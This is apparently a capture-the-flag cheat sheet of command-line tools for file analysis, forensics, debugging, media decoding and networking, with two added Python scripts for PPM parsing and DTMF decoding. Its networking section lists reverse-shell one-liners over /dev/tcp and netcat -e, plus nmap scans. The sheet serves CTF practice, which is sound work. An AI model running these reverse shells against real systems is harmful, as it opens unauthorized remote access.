Concise Capture the Flag Cheat Sheet

Binaries and Metadata Extractors
  Guess file type using magic           $ file file
  Printable strings in binary file      $ strings file
  Hexadecimal dump                      $ xxd [-c16 -g2] file
                                        $ hexdump file
                                        $ od -tx1z file
  Binary hexadecimal editor             $ elvis [-c"display hex"] file
  Extract JPEG EXIF data                $ exiv2 img.jpeg
                                        $ jhead img.jpeg
  Extract PNG metadata                  $ pngcheck -7ptv img.png
  List tarball contents                 $ tar -tf tarball.tar
  List zip contents                     $ unzip -l file.zip
  Extract ID3 metadata                  $ id3info file.mp3

Encoding / Decoding
  Encode base64                         $ base64 [file]
  Decode base64                         $ base64 -di [file]
  (De)code Caesar's                     $ caesar [0-25]
  Encode morse                          $ morse -s message
  Decode morse                          $ morse -d -- ... --- ...

Hashes
  md5sum                                $ md5sum file
  sha1sum                               $ sha1sum file
  sha256sum                             $ sha256sum file

Unix / Linux
  Extract tarball contents              $ tar -xvf tarball.tar
  Remove first 3 bytes                  $ tail -c +4 [file]
  Unzip                                 $ unzip file.zip

Disk Images / Forensics
  Mounting FS image                     $ mount fs.img mountpoint
    (override user/group)                 -o uid=user,gid=users
  List orphan inodes on disk image      $ ils fs.img
  List deleted files on disk image      $ fls -drp fs.img
  Output file contents from inode no.   $ icat fs.img 1337
  (Deleted) file contents on disk img.  $ fcat path/to/file fs.img

Databases
  Open sqlite database                  $ sqlite3 database.db
  List databases                        > .databases
  List tables                           > .tables
  Show table contents                   > select * from table;

Disassembly
  Disassemble program                   $ objdump -d prog
  Dump RO data section                  $ objdump -j .rodata -s prog
  List symbols from program             $ nm prog
  Disassemble (ndisasm)                 $ ndisasm prog
  Disasm. ncurses                       $ TERM=vt100 biew prog
  Assembly                              nasm, yasm, gas

Debugging
  simple / command line                 $ gdb ./program
    run program                         > r [parameters] [<redirects>]
    print backtrace                     > bt
    set breakpoint on foo               > b foo
    unset breakpoint(s)                 > delete breakpoint [no]
    next line (over)                    > n
    step line (into)                    > s
    next instruction (over)             > ni
    step instruction (into)             > si
    activate display next instr.        > display/i $pc
    continue execution                  > c
    save memory contents                > generate-core-file
  advanced / graphical                  $ edb ./program
  trace system calls                    $ strace ./program

Running and debugging Legacy/Other Systems
  DOS
    Open DOS with dir as C:             $ dosbox dir
      (debug mode)                      $ dosbox-debug dir
    Run prog in debug mode              C:\> debug prog.com
    DOSBox-debug step over              F10
    DOSBox-debug step into              F11
    DOSBox-debug scroll memory          PgUp / PgDn
    DOSBox-debug scroll program         + / -
  Windows
    Run executable                      $ wine prog.exe
    Debug executable                    $ winedbg prog.exe
    Debug executable                    $ ollydbg prog.exe
  IBM PC XT
    Start system                        $ fake86 -fd0 /usr/share/fake86/rombasic.bin
  Android
    dex to jar                          $ d2j-dex2jar classes.dex
    jar contents                        $ unzip classes.jar

Image Processing
  Editor (simple)                       $ pinta image
  Editor (advanced)                     $ gimp image
  Convert to pnm                        $ <type>topnm image.<type> > image.pnm   (e.g. pngtopnm, jpegtopnm)
  pnm (ppm) format                      P6                  (type)
                                        width height        (in printable digits)
                                        255                 (max color)
                                        RGBRGBRGBRGBRGB...  (× width × height)
  Bar/qrcode scanner                    $ zbarimg --raw image.png
  Gen. qrcode for word                  $ qrencode word -o image.png
    (from X selection)                  $ import i.png && zbarimg --raw i.png
  OCR in lng lang.                      $ tesseract [-l lng] i.png stdout
  Crop                                  $ convert -crop WxH+HP+VP i.png o.png
  Montage/Concat                        $ montage -mode concatenate *.png o.png

Video Processing
  Extract frames                        $ ffmpeg -i video.mp4 frame-%4d.jpeg
  Downl. vid. (yt/etc)                  $ youtube-dl "https://example.com/etc"

Audio Processing
  Graphical editor / waveform           $ audacity audio.flac
  Spectrogram                           $ sox audio.flac -n spectrogram
  Extract notes from MIDI               $ midi2ly music.midi
  Generate music sheet                  $ lilypond music.ly

Decoding Phone Dialing Tones
  Decode DTMF                           $ sox tone.ogg -esigned-integer -b16 -r 22050 -t raw - |
                                          multimon-ng -c -a DTMF -
  Anything else                         $ sox ... | multimon-ng
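The pnm (ppm) layout given under Image Processing is small enough to handle by hand, which is useful when a challenge image is corrupted or when its pixel data has to be inspected byte by byte. The following Python script is an added example and is not part of the cheat sheet or its author's code: it writes and parses binary PPM (P6) as the sheet describes (magic, width and height in printable digits, max color, then raw RGB bytes) and also covers two details the sheet's summary leaves implicit, namely `#` comments in the header and 2-byte samples when the max color exceeds 255. The 3x1 sample image and the threshold ASCII renderer are my own constructions.

```python
"""Added example: write and parse binary PPM (P6), the pnm layout listed
under Image Processing (magic, width height, max color, raw RGB bytes)."""
import re

# Constructed sample: a 3x1 image (white, black, grey) with a '#' comment in
# the header, which the format allows and naive parsers often choke on.
SAMPLE_PPM = (b"P6\n# constructed sample\n3 1\n255\n"
              + bytes([255, 255, 255, 0, 0, 0, 128, 128, 128]))


def write_ppm(width, height, pixels, maxval=255):
    """Serialize row-major (r, g, b) tuples as P6; samples are 1 byte if
    maxval < 256, otherwise 2 bytes big-endian."""
    if len(pixels) != width * height:
        raise ValueError("pixel count does not match width * height")
    if not 0 < maxval < 65536:
        raise ValueError("maxval out of range")
    bps = 1 if maxval < 256 else 2
    header = f"P6\n{width} {height}\n{maxval}\n".encode("ascii")
    body = b"".join(v.to_bytes(bps, "big") for px in pixels for v in px)
    return header + body


def parse_ppm(data):
    """Parse P6 bytes into (width, height, maxval, pixels).

    The four header tokens may be separated by any whitespace and '#'
    comments; exactly one whitespace byte separates maxval from the raster.
    Truncated input raises ValueError instead of yielding a short image."""
    tokens, pos = [], 0
    while len(tokens) < 4:
        if pos >= len(data):
            raise ValueError("truncated header")
        c = data[pos:pos + 1]
        if c.isspace():
            pos += 1
        elif c == b"#":                      # comment runs to end of line
            nl = data.find(b"\n", pos)
            pos = len(data) if nl < 0 else nl + 1
        else:
            tok = re.match(rb"[^\s#]+", data[pos:]).group(0)
            tokens.append(tok)
            pos += len(tok)
    if data[pos:pos + 1] not in (b" ", b"\t", b"\r", b"\n"):
        raise ValueError("missing whitespace before raster")
    pos += 1
    magic, width, height, maxval = tokens[0], int(tokens[1]), int(tokens[2]), int(tokens[3])
    if magic != b"P6":
        raise ValueError("not a binary PPM (P6) file")
    if not 0 < maxval < 65536:
        raise ValueError("maxval out of range")
    bps = 1 if maxval < 256 else 2
    need = width * height * 3 * bps
    raster = data[pos:pos + need]
    if len(raster) < need:
        raise ValueError("truncated raster")
    vals = [int.from_bytes(raster[i:i + bps], "big") for i in range(0, need, bps)]
    pixels = [tuple(vals[i:i + 3]) for i in range(0, len(vals), 3)]
    return width, height, maxval, pixels


def ascii_art(width, height, maxval, pixels, threshold=0.5):
    """Render dark pixels as '#' and light ones as '.', one row per line,
    so a small image can be eyeballed in a terminal."""
    rows = []
    for y in range(height):
        row = pixels[y * width:(y + 1) * width]
        rows.append("".join("#" if (r + g + b) / (3 * maxval) < threshold else "."
                            for r, g, b in row))
    return "\n".join(rows)


if __name__ == "__main__":
    w, h, mv, px = parse_ppm(SAMPLE_PPM)
    print(f"{w}x{h}, maxval {mv}")
    print(ascii_art(w, h, mv, px))
    with open("roundtrip.ppm", "wb") as f:      # viewable with pinta/gimp
        f.write(write_ppm(w, h, px, mv))
```

Because the header parser stops after exactly four tokens and then consumes a single whitespace byte, a raster that happens to start with a byte such as 0x0A is not swallowed as header whitespace, which is the usual off-by-one when people write this parser from memory.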
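The Decoding Phone Dialing Tones entry pipes raw signed 16-bit, 22050 Hz PCM from sox into multimon-ng. As an added example that is not from the cheat sheet or from the multimon-ng project, the Python script below shows what that decoder is doing with the same byte stream: it splits the PCM into frames, measures the power of the eight DTMF tone frequencies with the Goertzel algorithm, and emits a key when one row tone and one column tone clearly dominate. The test tones are synthesized inside the script; the 50 ms frame length, the 4:1 dominance ratio and the amplitude floor are my own choices, not multimon-ng's.

```python
"""Added example: decode DTMF keys from the raw PCM stream the sheet's sox
command emits (signed 16-bit little-endian, 22050 Hz) via Goertzel."""
import math
import struct

RATE = 22050                      # matches sox -r 22050 in the pipeline
LOW = (697, 770, 852, 941)        # DTMF row frequencies (Hz)
HIGH = (1209, 1336, 1477, 1633)   # DTMF column frequencies (Hz)
KEYS = ("123A", "456B", "789C", "*0#D")


def synth_digit(key, seconds=0.1, rate=RATE, amp=8000):
    """Constructed input: one DTMF key as little-endian int16 PCM, the same
    layout 'sox -esigned-integer -b16 -t raw' writes."""
    row = next(i for i, r in enumerate(KEYS) if key in r)
    f1, f2 = LOW[row], HIGH[KEYS[row].index(key)]
    n = int(seconds * rate)
    samples = [int(amp * (math.sin(2 * math.pi * f1 * t / rate)
                          + math.sin(2 * math.pi * f2 * t / rate)))
               for t in range(n)]
    return struct.pack(f"<{n}h", *samples)


def silence(seconds, rate=RATE):
    """Constructed input: a gap between keys."""
    return b"\x00\x00" * int(seconds * rate)


def goertzel(samples, freq, rate):
    """Power of a single frequency bin over one frame (no FFT needed)."""
    n = len(samples)
    k = int(0.5 + n * freq / rate)             # nearest DFT bin
    coeff = 2.0 * math.cos(2.0 * math.pi * k / n)
    s1 = s2 = 0.0
    for x in samples:
        s0 = x + coeff * s1 - s2
        s2, s1 = s1, s0
    return s1 * s1 + s2 * s2 - coeff * s1 * s2


def decode_frame(samples, rate=RATE, ratio=4.0, min_amp=200):
    """Return the key whose row and column tones dominate the frame, or None
    when the frame is silence or no tone clearly wins its group."""
    lp = [goertzel(samples, f, rate) for f in LOW]
    hp = [goertzel(samples, f, rate) for f in HIGH]
    floor = (min_amp * len(samples) / 2) ** 2   # power of a tone at amplitude min_amp
    r = max(range(4), key=lp.__getitem__)
    c = max(range(4), key=hp.__getitem__)
    for power, best in ((lp, r), (hp, c)):
        if power[best] < floor or power[best] < ratio * sorted(power)[-2]:
            return None
    return KEYS[r][c]


def decode_pcm(pcm, rate=RATE, frame_ms=50):
    """Split raw int16 PCM into frames and collapse runs of the same key;
    a silent frame ends a run so a repeated key is reported twice."""
    n = len(pcm) // 2
    samples = struct.unpack(f"<{n}h", pcm[:2 * n])
    frame = int(rate * frame_ms / 1000)
    keys, last = [], None
    for i in range(0, n - frame + 1, frame):
        key = decode_frame(samples[i:i + frame], rate)
        if key is not None and key != last:
            keys.append(key)
        last = key
    return "".join(keys)


if __name__ == "__main__":
    pcm = b"".join(synth_digit(k) + silence(0.1) for k in "1337#")
    print(decode_pcm(pcm))
```

To run it on a real recording, feed it the bytes the sheet's sox command writes to stdout (`sox tone.ogg -esigned-integer -b16 -r 22050 -t raw - | python3 dtmf.py` with a `sys.stdin.buffer.read()` in place of the synthesized input); the same Goertzel bank works for any tone alphabet once `LOW`, `HIGH` and `KEYS` are swapped.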
Concise Capture the Flag Cheat Sheet v0.4
Copyright 2014-2015, Rudy Matela – Compiled on September 20, 2015
Upstream: https://github.com/rudymatela/ultimate-cheat-sheets
This text is available under the Creative Commons Attribution-ShareAlike 3.0 Licence, or (at your option), the GNU Free Documentation License version 1.3 or later.
Networking
  Info about port                       $ cat /etc/services | grep port

  Passive scanning
    Network traffic (graphical)         $ wireshark
    Network traffic                     $ tshark -i interface -f filter
    List interfaces                     $ tshark -D
    Wifi HTTP traffic                   $ tshark -i wlan0 -f "port 80"
    Filter syntax                       $ man pcap-filter
    Network traffic (altn.)             $ tcpdump

  Active scanning
    Open ports on host                  $ nmap [-sV -O -p prange] host
    List hosts on a network             $ nmap [-sn] 192.168.0.*
    Query txt DNS field                 $ nslookup -query=txt example.com
    Query DNS info (on srv)             $ dig [@srv] example.com

  Interacting
    Network cat (GNU/BSD)               $ netcat host port
    Network cat (nmap altn.)            $ ncat host port
    Telnet to host on port              $ telnet host port

  Reverse shell / Connect back
    netcat listen                       client$ netcat -vlp 1337
    Linux connect back                  $ sh >& /dev/tcp/client/1337 0>&1
      (colored)                         $ bash -i >& /dev/tcp/client/1337 0>&1
    Netcat connect back                 $ netcat -e /bin/sh localhost 1337
      (colored)                         $ nc -e "/bin/bash -i" localhost 1337

Keyboard Scan Codes (US QWERTY)
        00      10      20      30      40      50
  +0    error   q       d       b       F6      KP 2
  +1    Esc     w       f       n       F7      KP 3
  +2    1       e       g       m       F8      KP 0
  +3    2       r       h       ,<      F9      KP Del
  +4    3       t       j       .>      F10     SysRq
  +5    4       y       k       /?      NmLck   –
  +6    5       u       l       RShift  ScLck   –
  +7    6       i       ;:      KP *    KP 7    F11
  +8    7       o       '"      LAlt    KP 8    F12
  +9    8       p       `~      Space   KP 9    –
  +a    9       [{      LShift  CaLck   KP -    –
  +b    0       ]}      \|      F1      KP 4    –
  +c    -_      Enter   z       F2      KP 5    –
  +d    =+      LCtrl   x       F3      KP 6    –
  +e    Back    a       c       F4      KP +    –
  +f    Tab     s       v       F5      KP 1    –

Number/character conversion
                        Ruby                Haskell
  lib                                       import Data.Char
                                            import Data.List (unfoldr)
                                            import Data.Maybe (listToMaybe)
                                            import Data.Tuple (swap)
  char to int           'a'.ord             ord 'a'
  int to char           0x61.chr            chr 0x61
  from hexadecimal      "FF".to_i(16)       foldl1 (\x y -> x*16 + y) . map digitToInt $ "FF"
  to hexadecimal        255.to_s(16)        map intToDigit . reverse
                                              . unfoldr (\n -> listToMaybe [swap $ n `divMod` 16 | n /= 0])
                                              $ 255

Dates
  Unix to Human         $ date -d "@seconds"
  Human to Unix         $ date -d "YYYY-mm-dd HH:MM:SS" +%s

Stuff to install (Arch Linux)
  Image processing      $ pacman -S pinta gimp netpbm
  Image metadata        $ pacman -S jhead exiv2 pngcheck
  QR/Barcode            $ pacman -S zbar qrencode
  Disk image            $ pacman -S sleuthkit libewf
  Networking (act.)     $ pacman -S {gnu,openbsd}-netcat nmap
  Networking (psv.)     $ pacman -S wireshark-{cli,gtk} tcpdump
  OCR                   $ pacman -S tesseract tesseract-data-eng
  Encoding/Decoding     $ pacman -S bsdgames
  8086 emulator         $ pacman -U fake86-???.pkg.tar.gz   # AUR
  Dial Tones            $ pacman -S archassault/multimon-ng
  Android               $ pacman -S archassault/dex2jar
  Tools available       $ pacman -Ql somekit | grep /bin/

Other stuff
  SQLi                  https://github.com/sqlmapproject/sqlmap